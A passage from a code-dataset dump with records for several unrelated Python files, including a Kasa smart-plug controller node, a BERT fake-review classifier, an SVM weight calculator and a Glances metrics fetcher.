PostDetailView.as_view(), name='detail'),\n # path('/edit/', PostUpdateView.as_view(), name='edit'),\n # path('/delete/', PostDeleteView.as_view(), name='delete'),\n ])),\n]\n","sub_path":"WebApplication/crm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509884544","text":"#\n# TP Link Kasa Smart Device Node\n# All Devices are one of these to share the common methods\n#\n#\nimport re,asyncio\nimport polyinterface\nfrom kasa import SmartDeviceException\nfrom converters import bri2st,st2bri\n\nLOGGER = polyinterface.LOGGER\n\nclass SmartDeviceNode(polyinterface.Node):\n\n def __init__(self, controller, parent_address, address, name, dev, cfg):\n self.controller = controller\n self.name = name\n self.dev = dev\n self.cfg = cfg\n self.pfx = f\"{self.name}:\"\n LOGGER.debug(f'{self.pfx} dev={dev}')\n LOGGER.debug(f'{self.pfx} cfg={cfg}')\n self.ready = False\n self.host = cfg['host']\n self.debug_level = 0\n self.st = None\n self.event = None\n self.connected = None # So start will force setting proper status\n LOGGER.debug(f'{self.pfx} controller={controller} address={address} name={name} host={self.host}')\n if not self.dev is None and self.dev.has_emeter:\n self.drivers.append({'driver': 'CC', 'value': 0, 'uom': 1}) #amps\n self.drivers.append({'driver': 'CV', 'value': 0, 'uom': 72}) #volts\n self.drivers.append({'driver': 'CPW', 'value': 0, 'uom': 73}) #watts\n self.drivers.append({'driver': 'TPW', 'value': 0, 'uom': 33}) #kWH\n self.cfg['id'] = self.id\n super().__init__(controller, parent_address, address, name)\n\n def start(self):\n self.connect()\n self.ready = True\n\n def query(self):\n self.set_state()\n self.set_energy()\n self.reportDrivers()\n\n def shortPoll(self):\n if not self.ready:\n return\n # Keep trying to connect if possible\n self.connect()\n self.set_state()\n\n def longPoll(self):\n if not self.connected:\n LOGGER.info(f'{self.pfx} Not connected, will retry...')\n self.connect()\n if self.connected:\n self.set_energy()\n\n def connect(self):\n if not self.is_connected():\n LOGGER.debug(f'{self.pfx} connected={self.is_connected()}')\n try:\n self.dev = self.newdev()\n # We can get a dev, but not really connected, so make sure we are connected.\n self.update()\n sys_info = self.dev.sys_info\n self.set_connected(True)\n except SmartDeviceException as ex:\n LOGGER.error(f\"{self.pfx} Unable to connect to device '{self.name}' {self.host} will try again later: {ex}\")\n self.set_connected(False)\n except:\n LOGGER.error(f\"{self.pfx} Unknown excption connecting to device '{self.name}' {self.host} will try again later\", exc_info=True)\n self.set_connected(False)\n return self.is_connected\n\n def update(self):\n asyncio.run(self.dev.update())\n\n def set_on(self):\n asyncio.run(self.dev.turn_on())\n self.set_state()\n self.set_energy()\n\n def set_off(self):\n asyncio.run(self.dev.turn_off())\n self.set_state()\n self.set_energy()\n\n def update(self):\n if self.dev is None:\n if self.connected:\n LOGGER.debug(f\"{self.pfx} No device\")\n self.set_connected(False)\n return False\n try:\n asyncio.run(self.dev.update())\n return True\n except SmartDeviceException as ex:\n if self.connected:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except Exception as ex:\n if self.connected:\n LOGGER.error(f'{self.pfx} failed', exc_info=True)\n self.set_connected(False)\n return False\n\n def set_state(self):\n LOGGER.debug(f'start: dev={self.dev}')\n # This 
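The commented-out detail/edit/delete routes in the crm urls.py above had their angle-bracket path converters swallowed during extraction. A Django route of that shape is conventionally written as below, though the exact converter the author used is an assumption:

from django.urls import include, path

urlpatterns = [
    path('list/', include([
        # a primary-key capture is the usual shape for a detail route:
        # path('<int:pk>/', PostDetailView.as_view(), name='detail'),
    ])),
]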
doesn't call set_energy, since that is only called on long_poll's\n # We don't use self.connected here because dev might be good, but device is unplugged\n # So then when it's plugged back in the same dev will still work\n if self.update():\n ocon = self.connected\n if self.dev.is_on is True:\n if self.dev.is_dimmable:\n self.brightness = st2bri(self.dev.brightness)\n self.setDriver('ST',self.dev.brightness)\n self.setDriver('GV5',int(st2bri(self.dev.brightness)))\n else:\n self.brightness = 100\n self.setDriver('ST',100)\n else:\n self.brightness = 0\n self.setDriver('ST',0)\n if self.dev.is_color:\n hsv = self.dev.hsv\n self.setDriver('GV3',hsv[0])\n self.setDriver('GV4',st2bri(hsv[1]))\n self.setDriver('GV5',st2bri(hsv[2]))\n if self.dev.is_variable_color_temp:\n self.setDriver('CLITEMP',self.dev.color_temp)\n\n # On restore, or initial startup, set all drivers.\n if not ocon and self.connected:\n try:\n self.set_all_drivers()\n except Exception as ex:\n LOGGER.error(f'{self.pfx} set_all_drivers failed: {ex}',exc_info=True)\n LOGGER.debug(f'end: dev={self.dev}')\n\n # Called by set_state when device is alive, does nothing by default\n def set_all_drivers(self):\n pass\n\n def set_energy(self):\n if not self.update():\n return\n if self.dev.has_emeter:\n try:\n energy = self.dev.emeter_realtime\n LOGGER.debug(f'{self.pfx} {energy}')\n if energy is not None:\n # rounding the values reduces driver updating traffic for\n # insignificant changes\n if 'current' in energy:\n self.setDriver('CC',round(energy['current'],3))\n if 'current_ma' in energy:\n self.setDriver('CC',round(energy['current_ma']/1000,3))\n\n if 'voltage' in energy:\n self.setDriver('CV',round(energy['voltage'],1))\n if 'voltage_mv' in energy:\n self.setDriver('CV',round(energy['voltage_mv']*1000,1))\n\n if 'power' in energy:\n self.setDriver('CPW',round(energy['power'],3))\n elif 'power_mw' in energy:\n val = energy['power_mw']\n LOGGER.debug(f\"{val}\")\n self.setDriver('CPW',round(energy['power_mw']/1000,3))\n\n if 'total' in energy:\n self.setDriver('TPW',round(energy['total'],3))\n if 'total_wh' in energy:\n self.setDriver('TPW',round(energy['total_wh'],3))\n\n except SmartDeviceException as ex:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except:\n LOGGER.error(f'{self.pfx} failed', exc_info=True)\n else:\n LOGGER.debug(f'{self.pfx} no energy')\n\n def set_connected(self,st):\n # Just return if setting to same status\n if st == self.connected:\n return\n LOGGER.debug(f\"{self.pfx} {st}\")\n self.connected = st\n self.setDriver('GV0',1 if st else 0)\n if st:\n # Make sure current cfg is saved\n LOGGER.debug(f\"{self.pfx} save_cfg {st}\")\n try:\n self.cfg['host'] = self.dev.host\n self.cfg['model'] = self.dev.model\n self.controller.save_cfg(self.cfg)\n except SmartDeviceException as ex:\n LOGGER.error(f'{self.pfx} failed: {ex}')\n except:\n LOGGER.error(f'{self.pfx} unknown failure', exc_info=True)\n\n def is_connected(self):\n return self.connected\n\n def cmd_set_on(self, command):\n self.set_on()\n\n def cmd_set_off(self, command):\n self.set_off()\n","sub_path":"nodes/SmartDeviceNode.py","file_name":"SmartDeviceNode.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352166267","text":"\"\"\" A RedirectionProvider Service Provider \"\"\"\n\nfrom config import session\nfrom masonite.drivers import SessionCookieDriver, SessionMemoryDriver\nfrom masonite.managers import SessionManager\nfrom masonite.provider import 
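SmartDeviceNode.py above defines update() twice in the same class body; Python silently keeps only the second definition, so the first (the bare asyncio.run call that lets SmartDeviceException propagate) is dead code worth deleting. The surviving pattern — bridging python-kasa's async API into this synchronous node class — reduces to:

import asyncio
from kasa import SmartDeviceException

def safe_update(dev) -> bool:
    # Run the async update from synchronous code and report success
    # instead of raising, so pollers can simply retry later.
    if dev is None:
        return False
    try:
        asyncio.run(dev.update())
        return True
    except SmartDeviceException:
        return False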
ServiceProvider\n\n\nclass SessionProvider(ServiceProvider):\n\n def register(self):\n self.app.bind('SessionConfig', session)\n self.app.bind('SessionMemoryDriver', SessionMemoryDriver)\n self.app.bind('SessionCookieDriver', SessionCookieDriver)\n self.app.bind('SessionManager', SessionManager(self.app))\n\n def boot(self, Environ, Request, ViewClass, SessionManager, SessionConfig):\n self.app.bind('Session', SessionManager.driver(SessionConfig.DRIVER))\n Session = self.app.make('Session')\n Request.session = Session\n\n ViewClass.share({\n 'session': Session.helper\n })\n","sub_path":"masonite/providers/SessionProvider.py","file_name":"SessionProvider.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537720841","text":"#!/net/homes/mlast/bin nuke-safe-python-tg\n\"\"\" Launch PythonEditor as a Standalone Application.\nThis file can also be executed from within an existing\nQt QApplication to launch PythonEditor in a separate window.\n\"\"\"\n# from __future__ import absolute_import\nimport sys\nimport os\nimport time\n\nsys.dont_write_bytecode = True\nstart = time.time()\n\nos.environ['PYTHONEDITOR_CAPTURE_STARTUP_STREAMS'] = '1'\n\n# with startup variables set,\n# we can now import the package in earnest.\nfrom PythonEditor.ui import ide\nfrom PythonEditor.ui.features import ui_palette\nfrom PythonEditor.ui.Qt import QtWidgets\nfrom PythonEditor.ui.Qt import QtGui\nfrom PythonEditor.ui.Qt import QtCore\n\n\ndef main():\n app = QtWidgets.QApplication.instance()\n if not app:\n app = QtWidgets.QApplication(sys.argv)\n\n for widget in app.allWidgets():\n if widget.objectName() == 'IDE':\n widget.close()\n\n PDF = 'PYTHONEDITOR_DEFAULT_FONT'\n fontbase = QtGui.QFontDatabase()\n current_folder = os.path.dirname(__file__)\n user_font_file = os.path.join(current_folder, 'scripts', 'fonts', 'DejaVu Sans Mono for Powerline.ttf')\n fontbase.addApplicationFont(user_font_file)\n\n os.environ[PDF] = 'DejaVu Sans Mono for Powerline'\n _ide = ide.IDE()\n _ide.setParent(app.activeWindow())\n _ide.setWindowFlags(QtCore.Qt.Window)\n _ide.setPalette(ui_palette.get_palette_style())\n\n # Plastique isn't available on Windows, so try multiple styles.\n styles = QtWidgets.QStyleFactory.keys()\n style_found = False\n for style_name in ['Plastique', 'Fusion']:\n if style_name in styles:\n print('Setting style to:', style_name)\n style_found = True\n break\n\n if style_found:\n style = QtWidgets.QStyleFactory.create(style_name)\n _ide.setStyle(style)\n\n print('PythonEditor import time: %.04f seconds' % (time.time() - start))\n #_ide.showMaximized()\n _ide.show()\n if app.applicationName() in ['python', 'mayapy', 'UE4Editor']:\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n try:\n main()\n except:\n import traceback\n traceback.print_exc()\n","sub_path":"python/PythonEditorLaunch.py","file_name":"PythonEditorLaunch.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341568544","text":"import warnings\nfrom sklearn.base import ClassifierMixin, BaseEstimator\nfrom sklearn.feature_selection import SelectKBest\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n\nclass FeatueSelectionClf(BaseEstimator, ClassifierMixin):\n def __init__(self, base_estimator, score_function, scale_features=0.5):\n self.base_estimator = base_estimator\n self.score_function = score_function\n self.scale_features = 
scale_features\n        self.estimator = None\n        self.selected_features = None\n        self.k = None\n        self.feature_costs = None\n\n    def fit(self, X, y):\n        self.k = int((self.scale_features) * X.shape[1])\n        KBest = SelectKBest(self.score_function, k=self.k)  # k is keyword-only in recent scikit-learn\n        KBest = KBest.fit(X, y)\n        self.selected_features = KBest.get_support()\n        # self.selected_features = [False, False, False, False, False, False, False, True]\n        # print(X[:, self.selected_features])\n        self.estimator = self.base_estimator.fit(X[:, self.selected_features], y)\n        return self\n\n    def predict(self, X):\n        return self.estimator.predict(X[:, self.selected_features])\n\n    def predict_proba(self, X):\n        return self.estimator.predict_proba(X[:, self.selected_features])\n\n    def selected_features_cost(self):\n        total_cost = 0\n        for id, cost in enumerate(self.feature_costs):\n            if self.selected_features[id]:\n                total_cost += cost\n        return total_cost\n","sub_path":"methods/fsclf.py","file_name":"fsclf.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597482687","text":"import tensorflow as tf\n\n#Defines type of inputs\ninput1 = tf.placeholder(tf.float32)\ninput2 = tf.placeholder(tf.float32)\n#Defines an op which will be used for output (tf.mul was removed in TF 1.0)\noutput = tf.multiply(input1, input2)\n\n#FEEDS data directly into the args of session.run\nwith tf.Session() as sess:\n    print(sess.run([output], feed_dict={input1:[7.], input2:[2.]}))\n\n#(works surprisingly faster)\n# output:\n# [array([ 14.], dtype=float32)]","sub_path":"basic_usage/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173433961","text":"# coding: utf-8 \nimport socket\nfrom server import *\nfrom labyrinthe import Labyrinthe\n\nlabyrinthe = Labyrinthe()\ntcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ntcpsock.bind((\"\",1111))\n\nwhile True:\n    tcpsock.listen(10)\n    (clientsocket, (ip, port)) = tcpsock.accept()\n    newthread = ClientThread(ip, port, clientsocket, labyrinthe)\n    newthread.start()\n","sub_path":"scripts_communication/interface graphique/scripts_communication/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497645","text":"import numpy as np\n\n#######################################################\ntable = \"\"\" |1|1.1764|4.2409|0.9750|1|\n            |2|1.0400|3.8676|0.4243|1|\n            |3|1.0979|1.0227|0.4484|1|\n            |4|2.0411|4.7610|0.6668|-1|\n            |5|2.0144|4.1217|1.2470|-1|\n            |6|2.1454|4.4439|0.3974|-1| \"\"\"\n\nlambdas = np.array([1,0.7383,0,0.0411,1,0.6972])\n\nw_b = 1\nNUM_FEATURES = 3\nDECIMAL_PRECISION = 4\n#######################################################\n\ndef extract(table):\n    lines = table.split('\\n')\n    l = []\n    for line in lines:\n        elements = line.split('|')\n        elements = [ a for a in elements if a.strip() ]\n        l.append(elements)\n    \n    np_table = np.array(l)\n    x = np_table[:,1:-1]\n    y = np_table[:,-1]\n    return len(lines), x.astype(float), y.astype(float)\n\ndef calculate_w(k, x, y, lamda):\n    # x = x.astype(float)\n    w = []\n    for i in range(k):\n        temp = float(y[i]) * float(lamda[i])\n        w.append(temp * x[i])\n    w = np.array(w)\n    return w.sum(axis=0)\n    \ndef calculate_wTx(k, w, x):\n    w = w.reshape(1,NUM_FEATURES)\n    predictions = []\n    for i in range(k):\n        prediction = np.matmul(w, x[i]) + w_b\n        
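# the value just computed is the decision function f(x_i) = w . x_i + b,\n        # with the bias b given by the w_b constant defined at the top of the file\n        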
predictions.append(prediction)\n return np.array(predictions)\n \n \n \nif __name__ == '__main__':\n k, x, y = extract(table)\n w = calculate_w(k, x, y, lambdas)\n print(\"\\nw=\", np.round(w,DECIMAL_PRECISION))\n print(\"\\npredictions: \\n\", np.round(calculate_wTx(k,w,x),DECIMAL_PRECISION))\n","sub_path":"4_SVMs/w_calculator.py","file_name":"w_calculator.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347489822","text":"# %% --------------------------------------- Imports -------------------------------------------------------------------\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, confusion_matrix\nfrom transformers.modeling_bert import BertForSequenceClassification\nfrom transformers.tokenization_bert import BertTokenizer\nfrom transformers import AdamW, WarmupLinearSchedule\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\n\n# %% --------------------------------------- Set-Up --------------------------------------------------------------------\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nSEED = 42\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\nrandom.seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nTRAIN, LOAD_MODEL, SAVE_MODEL = False, True, False\nFINAL_TEST = True\nEXTRACT_FEATURES = True\n\n# %% --------------------------------------- Hyper-Parameters ----------------------------------------------------------\nSEQ_LEN = 100\nN_LAYERS = 4\nN_FEATURES = 3\n\nEPOCHS = 10\nLR = 1e-5\nEPS = 1e-8\nBATCH_SIZE = 32\nCLASS_WEIGHTS = [0.1, 0.9] # First element for real, second element for fake\nWARM_UP_STEPS = 0\nGRADIENT_ACCUMULATION_STEPS = 1\n\n# %% ----------------------------------------- Helper Functions --------------------------------------------------------\ndef get_features(p, p_mask, net):\n features = np.zeros((len(p), net.cls.in_features))\n net.extract_features = True\n with torch.no_grad():\n with tqdm(total=len(p) // BATCH_SIZE + 1) as pbar:\n for batch in range(len(p) // BATCH_SIZE + 1):\n inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n if not inds:\n break\n features[inds] = net(p[inds].to(device), p_mask[inds].to(device)).cpu().numpy()\n pbar.update(1)\n return features\n\n# %% ----------------------------------------- Model Class -------------------------------------------------------------\nclass BERTForFeatures(nn.Module):\n def __init__(self, n_bert_layers=N_LAYERS, n_features=N_FEATURES, extract_features=False):\n super(BERTForFeatures, self).__init__()\n self.extract_features = extract_features\n self.bert = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\")\n self.bert.bert.encoder.layer = self.bert.bert.encoder.layer[:n_bert_layers]\n self.bert.classifier = nn.Linear(768, n_features)\n self.cls = nn.Linear(n_features, 2)\n\n def forward(self, p, attn_mask):\n features, *_ = self.bert(p, attention_mask=attn_mask)\n if self.extract_features:\n return features\n return self.cls(features)\n\n# %% -------------------------------------- Data Prep ------------------------------------------------------------------\nif \"prep_data\" not in os.listdir():\n os.mkdir(\"prep_data\")\nif 
\"x_{}tok.npy\".format(SEQ_LEN) not in os.listdir(os.getcwd() + \"/prep_data\"):\n from data_eda import data_restaurants\n x, x_mask = [], []\n print(\"Tokenizing the reviews...\")\n with tqdm(total=len(data_restaurants)) as pbar:\n for review in data_restaurants[\"Review\"].values:\n token_ids = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(review)[:SEQ_LEN-2])\n token_ids = [101] + token_ids + [102]\n n_ids = len(token_ids)\n attention_mask = [1] * n_ids\n if n_ids < SEQ_LEN:\n token_ids += [0] * (SEQ_LEN - n_ids)\n attention_mask += [0] * (SEQ_LEN - n_ids)\n x.append(token_ids)\n x_mask.append(attention_mask)\n pbar.update(1)\n x = np.array(x)\n y = LabelEncoder().fit_transform(data_restaurants[\"Fake\"].values)\n np.save(\"prep_data/x_{}tok.npy\".format(SEQ_LEN), x); np.save(\"prep_data/x_mask_{}tok.npy\".format(SEQ_LEN), x_mask)\n np.save(\"prep_data/y.npy\", y)\nelse:\n os.system(\"python3 data_eda.py\")\n x, x_mask = np.load(\"prep_data/x_{}tok.npy\".format(SEQ_LEN)), np.load(\"prep_data/x_mask_{}tok.npy\".format(SEQ_LEN))\n y = np.load(\"prep_data/y.npy\")\n\nx_train, x_test, mask_train, mask_test, y_train, y_test = train_test_split(\n x, x_mask, y, random_state=SEED, test_size=0.3, stratify=y)\nx_train, mask_train, y_train = torch.LongTensor(x_train), torch.FloatTensor(mask_train), torch.LongTensor(y_train)\nx_test, mask_test, y_test = torch.LongTensor(x_test), torch.FloatTensor(mask_test), torch.LongTensor(y_test)\n\n# %% -------------------------------------- Training Prep ----------------------------------------------------------\nmodel = BERTForFeatures().to(device)\nif \"saved_models_BERT\" not in os.listdir():\n os.mkdir(\"saved_models_BERT\")\nif LOAD_MODEL:\n try:\n model.load_state_dict(torch.load(\"saved_models_BERT/BERT_{}layers_{}features_{}len.pt\".format(N_LAYERS, N_FEATURES, SEQ_LEN)))\n print(\"A previous model was loaded successfully!\")\n except:\n print(\"Couldn't load model... Starting from scratch!\" if TRAIN else \"No model has been found... 
testing is kinda meaningless!\")\nif TRAIN:\n    optimizer = AdamW(model.parameters(), lr=LR, eps=EPS)\n    # scheduler = WarmupLinearSchedule(optimizer, warmup_steps=WARM_UP_STEPS,\n    #                                  t_total=len(x_train) // GRADIENT_ACCUMULATION_STEPS * EPOCHS)\n    criterion = nn.CrossEntropyLoss(torch.FloatTensor(CLASS_WEIGHTS).to(device))\n\n# %% -------------------------------------- Training Loop ----------------------------------------------------------\nif TRAIN:\n    recall_test_best = 0\n    inds_list = list(range(len(x_train)))\n    print(\"Starting training loop...\")\n    for epoch in range(EPOCHS):\n\n        random.shuffle(inds_list)\n        loss_train, steps_train, labels_pred, labels_real = 0, 0, [], []\n        model.train()\n        total = len(x_train) // BATCH_SIZE + 1\n        with tqdm(total=total, desc=\"Epoch {}\".format(epoch)) as pbar:\n            for inds in [inds_list[batch * BATCH_SIZE:(batch + 1) * BATCH_SIZE] for batch in range(len(inds_list) // BATCH_SIZE + 1)]:\n                if not inds:\n                    break\n                optimizer.zero_grad()\n                logits = model(x_train[inds].to(device), mask_train[inds].to(device))\n                loss = criterion(logits, y_train[inds].to(device))\n                loss.backward()\n                optimizer.step()\n                # scheduler.step()\n                loss_train += loss.cpu().item()\n                steps_train += 1\n                pbar.update(1)\n                labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n                labels_real += list(y_train[inds].numpy().reshape(-1))\n                pbar.set_postfix_str(\"Training Loss: {:.5f}, Precision: {:.2f}, Recall: {:.2f}\".format(\n                    loss_train / steps_train, precision_score(labels_real, labels_pred), recall_score(labels_real, labels_pred))\n                )\n        acc_train = accuracy_score(labels_real, labels_pred)\n        prec_train = precision_score(labels_real, labels_pred)\n        recall_train = recall_score(labels_real, labels_pred)\n        cf_train = confusion_matrix(labels_real, labels_pred)\n\n        loss_test, steps_test, labels_pred, labels_real = 0, 0, [], []\n        model.eval()\n        total = len(x_test) // BATCH_SIZE + 1\n        with torch.no_grad():\n            with tqdm(total=total, desc=\"Epoch {}\".format(epoch)) as pbar:\n                for batch in range(len(x_test) // BATCH_SIZE + 1):\n                    inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n                    logits = model(x_test[inds].to(device), mask_test[inds].to(device))\n                    loss = criterion(logits, y_test[inds].to(device))\n                    loss_test += loss.cpu().item()\n                    steps_test += 1\n                    pbar.update(1)\n                    labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n                    labels_real += list(y_test[inds].numpy().reshape(-1))\n                    pbar.set_postfix_str(\"Testing Loss: {:.5f}, Precision: {:.2f}, Recall: {:.2f}\".format(\n                        loss_test / steps_test, precision_score(labels_real, labels_pred), recall_score(labels_real, labels_pred))\n                    )\n        acc_test = accuracy_score(labels_real, labels_pred)\n        prec_test = precision_score(labels_real, labels_pred)\n        recall_test = recall_score(labels_real, labels_pred)\n        cf_test = confusion_matrix(labels_real, labels_pred)\n\n        print(\"Epoch {} | Train Loss {:.5f}, Acc {:.2f}, Precision {:.2f}, Recall {:.2f}\"\n              \" - Test Loss {:.5f}, Acc {:.2f}, Precision {:.2f}, Recall {:.2f}\".format(\n            epoch, loss_train / steps_train, acc_train, prec_train, recall_train, loss_test / steps_test, acc_test, prec_test, recall_test))\n        print(cf_train)\n        print(cf_test)\n\n        if recall_test > recall_test_best and SAVE_MODEL:\n            torch.save(model.state_dict(), \"saved_models_BERT/BERT_{}layers_{}features_{}len.pt\".format(N_LAYERS, N_FEATURES, SEQ_LEN))\n            print(\"A new model has been saved!\")\n            recall_test_best = recall_test\n\n# %% ----------------------------------------- Final Test 
--------------------------------------------------------------\nif FINAL_TEST:\n print(\"Computing metrics on test set...\")\n labels_pred, labels_real = [], []\n model.eval()\n with torch.no_grad():\n with tqdm(total=len(x_test) // BATCH_SIZE + 1) as pbar:\n for batch in range(len(x_test) // BATCH_SIZE + 1):\n inds = slice(batch * BATCH_SIZE, (batch + 1) * BATCH_SIZE)\n logits = model(x_test[inds].to(device), mask_test[inds].to(device))\n pbar.update(1)\n labels_pred += list(np.argmax(logits.detach().cpu().numpy(), axis=1).reshape(-1))\n labels_real += list(y_test[inds].numpy().reshape(-1))\n print(\"Test Acc {:.2f}, Test Recall {:.2f}\".format(accuracy_score(labels_real, labels_pred), recall_score(labels_real, labels_pred)))\n print(confusion_matrix(labels_real, labels_pred))\n\n# %% ----------------------------------------- Save Features -----------------------------------------------------------\nif EXTRACT_FEATURES:\n if \"saved_features_BERT\" not in os.listdir():\n os.mkdir(\"saved_features_BERT\")\n print(\"Saving BERT last cls weights...\")\n with open(\"BERT_last_weights{}layers_{}features_{}len.txt\".format(N_LAYERS, N_FEATURES, SEQ_LEN), \"w\") as s:\n s.write(str(model.cls.weight.data.cpu().numpy()))\n print(\"Extracting and saving features...\")\n features_train, features_test = get_features(x_train, mask_train, model), get_features(x_test, mask_test, model)\n np.save(\"saved_features_BERT/features_train_{}layers_{}features_{}len.npy\".format(N_LAYERS, N_FEATURES, SEQ_LEN), features_train)\n np.save(\"saved_features_BERT/features_test_{}layers_{}features_{}len.npy\".format(N_LAYERS, N_FEATURES, SEQ_LEN), features_test)\n print(\"The features have been saved!\")\n","sub_path":"AllUsers/BERT_features.py","file_name":"BERT_features.py","file_ext":"py","file_size_in_byte":11265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"396244344","text":"class MyError(Exception):\n def __init__(self, *args):\n print('calling init')\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self):\n print('Calling str')\n if self.message:\n return \"Here's MyError exception with message: {0}\".format(self.message)\n else:\n return \"Here's a MyError exception\"\n\n\nraise MyError()\n# raise MyError('Houston, we have a problem')\n","sub_path":"Courses/PythonBeyondTheBasics(OO-Programming)_David-Blaikie/7_ExceptionHandling/MyError.py","file_name":"MyError.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"122231266","text":"import numpy as np\nimport pandas as pd\nimport beacon8 as bb8\nimport beacon8.optimizers as optim\nfrom os.path import dirname, join as pjoin\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.cross_validation import train_test_split\nfrom train import train\nfrom test import validate\n\n\ndef load_train_data():\n train_data = pd.read_csv(pjoin(dirname(__file__), 'data', 'train.csv'))\n labels = train_data.target.values\n labels = LabelEncoder().fit_transform(labels)\n train_data = train_data.drop('id', axis=1)\n train_data = train_data.drop('target', axis=1)\n return train_data.as_matrix(), labels\n\ndef nnet():\n model = bb8.Sequential()\n model.add(bb8.AddConstant(1.0))\n model.add(bb8.Log())\n model.add(bb8.BatchNormalization(93))\n model.add(bb8.Dropout(0.1))\n model.add(bb8.Linear(93, 512))\n model.add(bb8.BatchNormalization(512))\n model.add(bb8.ReLU())\n 
model.add(bb8.Dropout(0.5))\n\n    model.add(bb8.Linear(512, 512))\n    model.add(bb8.BatchNormalization(512))\n    model.add(bb8.ReLU())\n    model.add(bb8.Dropout(0.5))\n\n    model.add(bb8.Linear(512, 9))\n    model.add(bb8.SoftMax())\n    return model\n\nif __name__ == \"__main__\":\n    if __package__ is None:  # PEP366\n        __package__ = \"beacon8.examples.KaggleOtto\"\n\n    train_data_x, train_data_y = load_train_data()\n\n    train_data_x, valid_data_x, train_data_y, valid_data_y = train_test_split(train_data_x, train_data_y, train_size=0.85)\n    model = nnet()\n\n    criterion = bb8.ClassNLLCriterion()\n\n    optimiser = optim.Momentum(lr=0.01, momentum=0.9)\n\n    for epoch in range(1, 1001):\n        model.training()\n        if epoch % 100 == 0:\n            optimiser.hyperparams['lr'] /= 10\n        train(train_data_x, train_data_y, model, optimiser, criterion, epoch, 100, 'train')\n        train(train_data_x, train_data_y, model, optimiser, criterion, epoch, 100, 'stats')\n\n        model.evaluate()\n        validate(valid_data_x, valid_data_y, model, epoch, 100)\n\n","sub_path":"examples/Kaggle-Otto/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275363412","text":"'''\nCreated on Jan 17, 2013\n\n@author: ayush\n'''\n\nimport os\nimport sys\n\ndef fix_path(path):\n    offset = 0\n    if path[-1] != '/':\n        path = path + '/'\n    if path[0] == '/':\n        offset = 1\n    idx = path.find('/', offset)\n    while idx != -1:\n        try:\n            if not os.path.exists(path[:idx]):\n                # create only the missing prefix, so the error message below\n                # names the component that actually failed\n                os.makedirs(path[:idx])\n            idx = path.find('/', idx + 1)\n        except:\n            sys.exit(\"Unable to create path: \" + path[:idx + 1])","sub_path":"Corpus Generator/Scrapy/TOI_Crawler/path_fixer.py","file_name":"path_fixer.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473286093","text":"import json\nimport multiprocessing\nimport sys\nsys.path.append('../')\n\nfrom sharings.AsyncioRequests import AsyncioRequests\nfrom glancesapi.ProcessGlances import ProcessGlances\nfrom sharings.utils import parse_nodelist\n\n\ndef fetch_glances(glances_config: dict) -> list:\n    \"\"\"\n    fetch OS metrics from glances API. 
\n    Examples of using glances API:\n    curl http://10.10.1.4:61208/api/3/pluginslist | python -m json.tool\n    curl http://10.10.1.4:61208/api/3/percpu | python -m json.tool\n    \"\"\"\n    all_datapoints = []\n    try:\n        api = glances_config[\"api\"]\n        port = glances_config[\"port\"]\n        nodes = parse_nodelist(glances_config[\"nodelist\"])\n\n        # Generate glances API urls for the specified nodes\n        urls = [\"http://\" + node + \":\" + str(port) + api for node in nodes]\n\n        # Asynchronously fetch glances metrics from all nodes\n        glances = AsyncioRequests()\n        node_metrics = glances.bulk_fetch(urls, nodes)\n\n        # Process metrics and generate data points using multiprocessing\n        with multiprocessing.Pool() as pool:\n            datapoints = pool.map(process_metric, node_metrics)\n\n        # Flatten the datapoints\n        all_datapoints = [item for sublist in datapoints for item in sublist]\n\n        return all_datapoints\n\n    except Exception as e:\n       